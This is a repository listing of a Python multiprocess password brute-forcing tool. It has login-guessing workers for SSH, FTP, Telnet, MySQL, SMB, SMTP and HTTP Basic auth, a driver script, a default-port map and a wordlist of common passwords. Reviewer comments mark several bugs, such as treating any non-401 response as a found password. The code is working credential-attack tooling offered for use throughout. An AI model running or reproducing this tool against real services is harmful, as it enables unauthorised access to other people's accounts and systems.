├── conf
    └── defaultPort.py
├── dict
    └── passwd
├── lib
    ├── ftpcrack.py
    ├── mysqlcrack.py
    ├── smbcrack.py
    ├── smtpcrack.py
    ├── http401crack.py
    ├── telnetcrack.py
    └── sshcrack.py
├── README.md
└── crack.py


/conf/defaultPort.py:
--------------------------------------------------------------------------------
# Default port for each service type. crack.py accepts only these keys as -T
# values and falls back to the mapped port when -p is not given. 'smb' maps to
# a list, which crack.py's checkservice() probes one port at a time.
cracklist = {
    'ssh': 22,
    'ftp': 21,
    'smb': [139, 445],
    'telnet': 23,
    'mysql': 3306,
    'http401': 8080,
    'smtp': 25,
}

--------------------------------------------------------------------------------
/dict/passwd:
--------------------------------------------------------------------------------
admin
Password
123456
123456789
111111
123123
12345678
a123456
000000
5201314
11111111
wodima123
a123456789
zxcvbnm
123456a
123321
qq123456
woaini1314
123456789a
passport
1234567890
1314520
abc123456
123123123
1234567
7758521
666666
woaini

--------------------------------------------------------------------------------
/lib/ftpcrack.py:
--------------------------------------------------------------------------------
import time
import ftplib

class ftpcrack:
    '''FTP login worker: tries queued passwords for one username against op.host:op.port.'''
    def __init__(self,op,args):
        # op: parsed command-line options (host, port and verbose are read below).
        # args: leftover positional arguments; stored but not used in this file.
        self.op=op
        self.args=args

    def run(self,inputq,outputq,username):
        '''Consume passwords from inputq until one logs in or the queue runs dry.

        inputq   -- queue of candidate passwords
        outputq  -- result queue: receives (username, passwd) after a successful
                    login, or the integer 1 when this worker stops for lack of input
        username -- the single account name used for every attempt

        Never returns normally; both outcomes end the process through exit(1).
        '''
        while True:
            try:
                passwd=inputq.get(timeout=1)
            except:
                # Bare except: any failure of get(), not only an empty queue
                # after the 1 s timeout, is reported as "this worker is done".
                outputq.put(1)
                time.sleep(0.5)
                exit(1)

            try:
                # A new FTP object, connection and login for every candidate, so
                # each guess reaches the server as a separate session for the
                # same account name.
                f=ftplib.FTP()
                f.connect(self.op.host,port=self.op.port)
                f.login(username,passwd)
                outputq.put((username,passwd))

                time.sleep(0.5)
                # exit() raises SystemExit, which `except Exception` below does
                # not catch, so the worker stops here. The exit status is 1 for
                # success as well as for an exhausted queue.
                exit(1)
            except Exception as e:
                # NOTE(review): a connection error and a rejected login take the
                # same path, and f is never closed on either path.
                # Both branches print the attempted password in cleartext.
                if self.op.verbose!=None:
                    print("%s ----- (Username:%s Passwd:%s)" %(e,username,passwd))
                else:
                    print("Username:%s Passwd:%s" % (username, passwd))






--------------------------------------------------------------------------------
/lib/mysqlcrack.py:
--------------------------------------------------------------------------------
'''
module : pymysql


'''


import time
import pymysql
import re  # NOTE(review): not referenced anywhere in this file

class mysqlcrack:
    '''MySQL login worker: tries queued passwords for one username against op.host:op.port.'''
    def __init__(self,op,args):
        # op: parsed command-line options (host, port and verbose are read below).
        # args: leftover positional arguments; stored but not used in this file.
        self.op=op
        self.args=args


    def run(self,inputq,outputq,username):
        '''Consume passwords from inputq until one connects or the queue runs dry.

        inputq   -- queue of candidate passwords
        outputq  -- result queue: receives (username, passwd) after a successful
                    connect, or the integer 1 when this worker stops for lack of input
        username -- the single account name used for every attempt

        Never returns normally; both outcomes end the process through exit(1).
        '''
        while True:
            try:
                passwd=inputq.get(timeout=1)
            except:
                # Bare except: any failure of get(), not only an empty queue
                # after the 1 s timeout, is reported as "this worker is done".
                outputq.put(1)
                time.sleep(0.5)
                exit(1)



            try:
                # One new connection per candidate. The connection object that
                # pymysql.connect() returns is discarded and never closed.
                pymysql.connect(self.op.host, username,passwd, port=self.op.port)
                outputq.put((username,passwd))
                time.sleep(0.5)
                # SystemExit is not an Exception subclass, so it passes the
                # handler below and ends the worker.
                exit(1)
            except Exception as e:
                # NOTE(review): every exception counts as a wrong password; an
                # unreachable server and a rejected login are not told apart.
                # Both branches print the attempted password in cleartext.
                if self.op.verbose!=None:
                    print("%s ----- (Username:%s Passwd:%s)" %(e,username,passwd))
                else:
                    print("Username:%s Passwd: %s" %(username, passwd))

            finally:
                # No-op: nothing is cleaned up here.
                pass
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
#
简介:

python3多进程爆破程序,目前支持telnet/ftp/mysql/http401/smb/smtp/ssh


#
目录结构:

conf: 配置文件
lib: 函数库
dict: 爆破字典目录
mcrack.py 入口程序

#
使用简介:

Usage: crack.py [options]

Options:
  -h, --help            show this help message and exit
  -H HOST, --host=HOST  dest host
  -T TYPE, --type=TYPE  such:ssh,file,ftp,telnet
  --process=PROCESS     set num of process to run,default 4
  -P PASSWD, --passwd=PASSWD
                        set login passwd dictory
  -U USERNAME, --username=USERNAME
                        set login user
  -F FILE, --file=FILE  set zip/rar file
  -p PORT, --port=PORT  set service port
  -v, --verbose
  -u URL, --url=URL     set url to crack

Example:
python crack.py -H 127.0.0.1 -Uroot -Ppasswd -T ftp
python crack.py -H 127.0.0.1 -Uroot -Ppasswd -T ssh
python crack.py =H 127.0.0.1 -U root -Ppasswd -T mysql

--------------------------------------------------------------------------------
/lib/smbcrack.py:
--------------------------------------------------------------------------------
'''
module : pysmb
s=SMBConnection.SMBConnection(username,passwd,'','')
s.connect(self.op.host) return True | false

'''


import time
from smb import SMBConnection

class smbcrack:
    '''SMB login worker: tries queued passwords for one username against op.host.'''
    def __init__(self,op,args):
        # op: parsed command-line options (host and verbose are read below).
        # args: leftover positional arguments; stored but not used in this file.
        self.op=op
        self.args=args

    def run(self,inputq,outputq,username):
        '''Consume passwords from inputq until one authenticates or the queue runs dry.

        inputq   -- queue of candidate passwords
        outputq  -- result queue: receives (username, passwd) when connect()
                    returns True, or the integer 1 when this worker stops for
                    lack of input
        username -- the single account name used for every attempt
        '''
        while True:
            try:
                passwd=inputq.get(timeout=1)
            except:
                # Bare except: any failure of get(), not only an empty queue
                # after the 1 s timeout, is reported as "this worker is done".
                outputq.put(1)
                time.sleep(0.5)
                exit(1)


            # The two empty strings are passed as the third and fourth
            # positional arguments of SMBConnection.
            s=SMBConnection.SMBConnection(username,passwd,'','')
            # NOTE(review): connect() gets only the host, so op.port is never
            # used here. The call is also outside any try block: an exception
            # from it ends this worker without putting the sentinel 1 on outputq.
            if s.connect(self.op.host)==True:
                outputq.put((username,passwd))
                time.sleep(0.5)
                exit(1)
            else:
                # Both branches print the attempted password in cleartext; the
                # connection object is not closed.
                if self.op.verbose!=None:
                    e='login incorrect'
                    print("%s ----- (Username:%s Passwd:%s)" %(e,username,passwd))
                else:
                    print("Username:%s Passwd:%s:" % (username, passwd))
--------------------------------------------------------------------------------
/lib/smtpcrack.py:
--------------------------------------------------------------------------------
'''
module : smtplib
smtpObj = smtplib.SMTP()
smtpObj.connect(mail_host, 25) # 25 is the SMTP port
smtpObj.login(mail_user,mail_pass)

'''


import time
import smtplib

class smtpcrack:
    '''SMTP AUTH worker: tries queued passwords for one username against op.host:op.port.'''
    def __init__(self,op,args):
        # op: parsed command-line options (host, port and verbose are read below).
        # args: leftover positional arguments; stored but not used in this file.
        self.op=op
        self.args=args

    def run(self,inputq,outputq,username):
        '''Consume passwords from inputq until one logs in or the queue runs dry.

        inputq   -- queue of candidate passwords
        outputq  -- result queue: receives (username, passwd) after a successful
                    login, or the integer 1 when this worker stops for lack of input
        username -- the single account name used for every attempt

        Never returns normally; both outcomes end the process through exit(1).
        '''
        while True:
            try:
                passwd=inputq.get(timeout=1)
            except:
                # Bare except: any failure of get(), not only an empty queue
                # after the 1 s timeout, is reported as "this worker is done".
                outputq.put(1)
                time.sleep(0.5)
                exit(1)


            try:
                # One new session per candidate. login() is called directly
                # after connect(); this code makes no starttls() call.
                smtpObj = smtplib.SMTP()
                smtpObj.connect(self.op.host, self.op.port)  # 25 is the SMTP port
                smtpObj.login(username, passwd)
                outputq.put((username,passwd))
                time.sleep(0.5)
                # SystemExit is not an Exception subclass, so it passes the
                # handler below and ends the worker.
                exit(1)
            except Exception as e:
                if self.op.verbose!=None:
                    # NOTE(review): the caught exception is overwritten with a
                    # fixed string, so verbose output cannot tell a connection
                    # failure from a rejected login.
                    e='login incorrect'
                    print("%s ----- (Username:%s Passwd:%s)" %(e,username,passwd))
                else:
                    print("Username:%s Passwd:%s:" % (username, passwd))
--------------------------------------------------------------------------------
/lib/http401crack.py:
--------------------------------------------------------------------------------
'''
module : requests


'''


import time
import requests
import base64


class http401crack:
    '''HTTP Basic-auth worker: tries queued passwords for one username against op.url.'''
    def __init__(self,op,args):
        # op: parsed command-line options (url and verbose are read below).
        # args: leftover positional arguments; stored but not used in this file.
        self.op=op
        self.args=args

    def run(self,inputq,outputq,username):
        '''Consume passwords from inputq until a response is not 401 or the queue runs dry.

        inputq   -- queue of candidate passwords
        outputq  -- result queue: receives (username, passwd) when the response
                    status is anything other than 401, or the integer 1 when
                    this worker stops for lack of input
        username -- the single account name used for every attempt
        '''
        while True:
            try:
                passwd=inputq.get(timeout=1)
            except:
                # Bare except: any failure of get(), not only an empty queue
                # after the 1 s timeout, is reported as "this worker is done".
                outputq.put(1)
                time.sleep(0.5)
                exit(1)



            # Basic credentials are only base64("user:pass"), which is an
            # encoding and not encryption.
            data=base64.b64encode((username+':'+passwd).encode('utf-8'))
            # Every request carries the same hard-coded User-Agent string, so
            # the run appears in the web server's access log as repeated GETs
            # for one URL with this exact agent value.
            headers={
                "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36",
                "Authorization": "Basic "+data.decode(),
            }

            # NOTE(review): there is no timeout argument and no try block, so a
            # request exception ends this worker without putting the sentinel 1
            # on outputq.
            rep=requests.get(self.op.url,headers=headers)
            # NOTE(review): "not 401" is the only success test, so a 403, 404 or
            # 5xx response is also reported as a found password.
            if rep.status_code!=401:
                outputq.put((username,passwd))
                time.sleep(0.5)
                exit(1)
            else:
                # Both branches print the attempted password in cleartext.
                if self.op.verbose!=None:
                    e='login incorrect'
                    print("%s ----- (Username:%s Passwd:%s)" %(e,username,passwd))
                else:
                    print("Username:%s Passwd:%s:" % (username, passwd))
--------------------------------------------------------------------------------
/lib/telnetcrack.py:
--------------------------------------------------------------------------------
'''
module : telnetlib


'''


import time
import telnetlib  # NOTE(review): telnetlib was deprecated in Python 3.11 and removed in 3.13
import re  # NOTE(review): not referenced anywhere in this file

class telnetcrack:
    '''Telnet login worker: tries queued passwords for one username against op.host:op.port.'''
    def __init__(self,op,args):
        # op: parsed command-line options (host, port and verbose are read below).
        # args: leftover positional arguments; stored but not used in this file.
        self.op=op
        self.args=args


    def run(self,inputq,outputq,username):
        '''Consume passwords from inputq until a login dialogue completes or the queue runs dry.

        inputq   -- queue of candidate passwords
        outputq  -- result queue: receives (username, passwd) when the dialogue
                    below finishes without raising, or the integer 1 when this
                    worker stops for lack of input
        username -- the single account name used for every attempt
        '''
        while True:
            try:
                passwd=inputq.get(timeout=1)
            except:
                # Bare except: any failure of get(), not only an empty queue
                # after the 1 s timeout, is reported as "this worker is done".
                outputq.put(1)
                time.sleep(0.5)
                exit(1)



            try:
                tn = telnetlib.Telnet(self.op.host,port=self.op.port,timeout=1)
                # The prompts are matched as the exact byte strings "login:" and
                # "Password:"; read_until() is called without a timeout of its own.
                tn.read_until("login:".encode())
                tn.write((username+'\r\n').encode())
                tn.read_until("Password:".encode())
                tn.write((passwd+"\r\n").encode())
                # NOTE(review): the four replies are read and discarded. Success
                # here means only that no call raised; the server's answer is
                # never inspected.
                tn.read_some()
                tn.read_some()
                tn.read_some()
                tn.read_some()
                outputq.put((username,passwd))
                time.sleep(0.5)
                exit(1)
            except Exception as e:
                # Both branches print the attempted password in cleartext.
                if self.op.verbose!=None:
                    print("%s ----- (Username:%s Passwd:%s)" %(e,username,passwd))
                else:
                    print("Username:%s Passwd: %s" % (username, passwd))

            finally:
                # NOTE(review): if the Telnet() constructor raises on the first
                # pass, tn is unbound and this line raises NameError; on later
                # passes tn still refers to the previous connection.
                tn.close()
--------------------------------------------------------------------------------
/lib/sshcrack.py:
--------------------------------------------------------------------------------
'''
module : ssh
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname=hostname,port=port,username=username,password=password)


Re-download the paramiko source, unpack it, and edit the transport.py file under the install directory:

vim build/lib/paramiko/transport.py

Search for the self.banner_timeout keyword and raise its value, for example to 300s:

self.banner_timeout = 300

Finally, reinstall paramiko.

Keep the maximum number of processes at around 8, otherwise the error mentioned above is reported.
'''


import time
import paramiko

class sshcrack:
    '''SSH password-auth worker: tries queued passwords for one username against op.host:op.port.'''
    def __init__(self,op,args):
        # op: parsed command-line options (host, port and verbose are read below).
        # args: leftover positional arguments; stored but not used in this file.
        self.op=op
        self.args=args

    def run(self,inputq,outputq,username):
        '''Consume passwords from inputq until one authenticates or the queue runs dry.

        inputq   -- queue of candidate passwords
        outputq  -- result queue: receives (username, passwd) after a successful
                    connect, or the integer 1 when this worker stops for lack of input
        username -- the single account name used for every attempt

        Never returns normally; both outcomes end the process through exit(1).
        '''
        while True:
            try:
                passwd=inputq.get(timeout=1)
            except:
                # Bare except: any failure of get(), not only an empty queue
                # after the 1 s timeout, is reported as "this worker is done".
                outputq.put(1)
                time.sleep(0.5)
                exit(1)


            try:
                # A new client and a new connection per candidate.
                ssh = paramiko.SSHClient()
                # AutoAddPolicy accepts an unknown host key without verification,
                # so the identity of the remote end is never checked.
                ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                ssh.connect(hostname=self.op.host, port=self.op.port, username=username, password=passwd)
                outputq.put((username,passwd))
                time.sleep(0.5)
                # SystemExit passes the `except Exception` handler; the finally
                # clause still runs and closes the client before the worker ends.
                exit(1)
            except Exception as e:
                # NOTE(review): authentication failures and transport errors
                # share this path. Both branches print the attempted password
                # in cleartext.
                if self.op.verbose!=None:
                    print("%s ----- (Username:%s Passwd:%s)" %(e,username,passwd))
                else:
                    print("Username:%s Passwd:%s:" % (username, passwd))


            finally:
                ssh.close()
--------------------------------------------------------------------------------
/crack.py:
--------------------------------------------------------------------------------
import sys
import optparse
import os
from multiprocessing import Process,Manager
import telnetlib

# Relative entries: lib/ and conf/ are found only when the current working
# directory is the repository root.
sys.path.append('lib')
sys.path.append('conf')

import defaultPort

# Both paths derive from the current working directory, not from this file's location.
ROOTPATH=os.path.realpath('.')
DICTPATH=ROOTPATH+'/dict/'


class mcrack:
    '''Command-line driver: parses options, probes the port, loads the wordlist, starts the workers.

    Constructing the object runs the whole program: __init__ calls
    checkservice(), which calls load(), which calls run().
    '''
    # Maps service type to default port(s); its keys are the accepted -T values.
    cracklist=defaultPort.cracklist
    def __init__(self):
        # No option declares a type, so optparse hands every value over as a
        # string (verbose is a count, or None when -v is absent).
        parse = optparse.OptionParser()
        parse.add_option("-H", '--host', dest='host', help='dest host')
        parse.add_option('-T', '--type', dest='type', help='such:ssh,file,ftp,telnet')
        parse.add_option('--process',dest='process',help='set num of process to run,default 4',default='4')
        parse.add_option('-P','--passwd',dest='passwd',help='set login passwd dictory')
        parse.add_option('-U','--username',dest='username',help='set login user')
        parse.add_option('-F','--file',dest='file',help='set zip/rar file')
        parse.add_option('-p','--port',dest='port',default=None,help='set service port')
        parse.add_option('-v','--verbose',dest='verbose',action='count')
        parse.add_option('-u','--url',dest='url',help='set url to crack')

        # NOTE(review): the help text mentions "file", "mstsc" and a zip/rar
        # option, but the type check below accepts only the keys of cracklist;
        # the last example also spells the host flag "=H".
        example=optparse.OptionGroup(
            parse,
            'Example',
            '''python crack.py -H 127.0.0.1 -Uroot -Ppasswd -T ftp \r\n
            python crack.py -H 127.0.0.1 -Uroot -Ppasswd -T ssh\r\n
            python crack.py -H 127.0.0.1 -Uroot -Ppasswd -T mstsc\r\n
            python crack.py =H 127.0.0.1 -U root -Ppasswd -T mysql\r\n
            ''',
        )
        parse.add_option_group(example)

        self.op, self.args = parse.parse_args()


        # Host, type, wordlist name and username are all required; the type must
        # be a key of cracklist, which also bounds the module name that run()
        # later imports.
        if self.op.type == None or self.op.host == None or self.op.passwd==None or self.op.username==None:
            print("Usage: python crack.py -U root -H 127.0.0.1 -T smb -P passwd")
        elif self.op.type not in self.cracklist:
            print("Usage: python crack.py -H 127.0.0.1 -T [%s] ......." %"|".join(self.cracklist))
        else:
            self.checkservice()

    def load(self):
        '''Read the wordlist named by -P from DICTPATH into self.inputQ, then call run().'''
        # 1. Check whether the wordlist file exists; if it does, fill the dictionary queue.
        print("[-]Dictory Loading.......")
        try:
            self.inputQ=Manager().Queue()
            with open(DICTPATH+self.op.passwd,encoding='utf-8') as f:
                while True:
                    # An empty string after strip() means end of file or a blank
                    # line, so reading stops at the first blank line.
                    line=f.readline().strip()
                    if line!="":
                        self.inputQ.put(line)
                    else:
                        break
            print("[+] %s -- the dictory is load ok!" %self.op.passwd)

        except Exception as e:
            # Any exception, not only a missing file, produces this message.
            print("[-] The Passwd File Is Not Exsit!")

        # NOTE(review): indentation was rebuilt from a flattened listing. As laid
        # out here, run() is reached after the except branch as well — confirm.
        self.run()



    def checkPort(self,port):
        '''Return (ok, message) for one pre-flight check.

        For type 'http401' only the presence of -u is checked; for every other
        type a TCP connection to op.host:port is attempted with a 1 s timeout.
        '''
        if self.op.type=='http401':
            # Check whether a URL was supplied; stop if it was not.
            if self.op.url!=None:
                return (True,'http401')
            else:
                return (False,'401爆破:请输入URL地址')
        else:
            try:
                # telnetlib serves only as a TCP connect probe; the Telnet
                # object is neither kept nor closed.
                telnetlib.Telnet(self.op.host, port=port, timeout=1)
                # NOTE(review): the quoting makes this one literal string, so
                # nothing is formatted and the text says "closed" on the success
                # path. checkservice() ignores the message when status is True.
                return (True,'%s:%s is closed!" % (self.op.host, self.op.port)')
            except:
                # Formats self.op.port, which may be the whole list, rather than
                # the port argument that was probed.
                return (False,"%s:%s is closed!" %(self.op.host,self.op.port))


    def checkservice(self):
        '''Check the service port(s); exit immediately if one is unreachable.'''

        if self.op.port==None:
            self.op.port=self.cracklist[self.op.type]


        # The smb default is a list: every port in it must accept a connection.
        if isinstance(self.op.port,list):
            for port in self.op.port:
                status,msg=self.checkPort(port)
                if not status:
                    print(msg)
                    exit(1)

        else:
            status,msg = self.checkPort(self.op.port)
            if not status:
                print(msg)
                exit(1)

        self.load()

    def run(self):
        '''Start the worker processes and wait for a result on self.outputQ.'''

        # 1. Set up outputq.
        self.outputQ = Manager().Queue()

        # 1. Load the cracking module and start the configured number of processes.

        # Module and class share one name, '<type>crack', resolved through the
        # 'lib' entry appended to sys.path; type was checked against cracklist
        # in __init__.
        crackName=self.op.type+'crack'
        moduleName=__import__(crackName)
        t=getattr(moduleName,crackName)(self.op,self.args)


        plist=[]
        for i in range(0,int(self.op.process)):
            p=Process(target=t.run,args=(self.inputQ,self.outputQ,self.op.username))
            plist.append(p)
            p.start()

        print("The CPU Concurrent Number is %s......" %self.op.process)

        # flag counts the sentinel 1 that each worker posts when it finds the
        # input queue empty.
        # NOTE(review): the threshold is the constant 4 while the worker count
        # comes from --process; outputQ.get() has no timeout, so the loop waits
        # indefinitely if fewer than four sentinels ever arrive.
        flag=0
        while True:
            if flag==4:
                print("\n[-]not Found Passwd!")
                break
            data=self.outputQ.get()
            if data==1:
                flag+=1
            else:
                # The recovered credential is written to stdout in cleartext.
                print("\n[+]Found Passwd: %s/%s" %(data[0],data[1]))
                break


        print()

        # Stop any workers that are still running.
        for p in plist:
            p.terminate()




if __name__=="__main__":
    crack=mcrack()

--------------------------------------------------------------------------------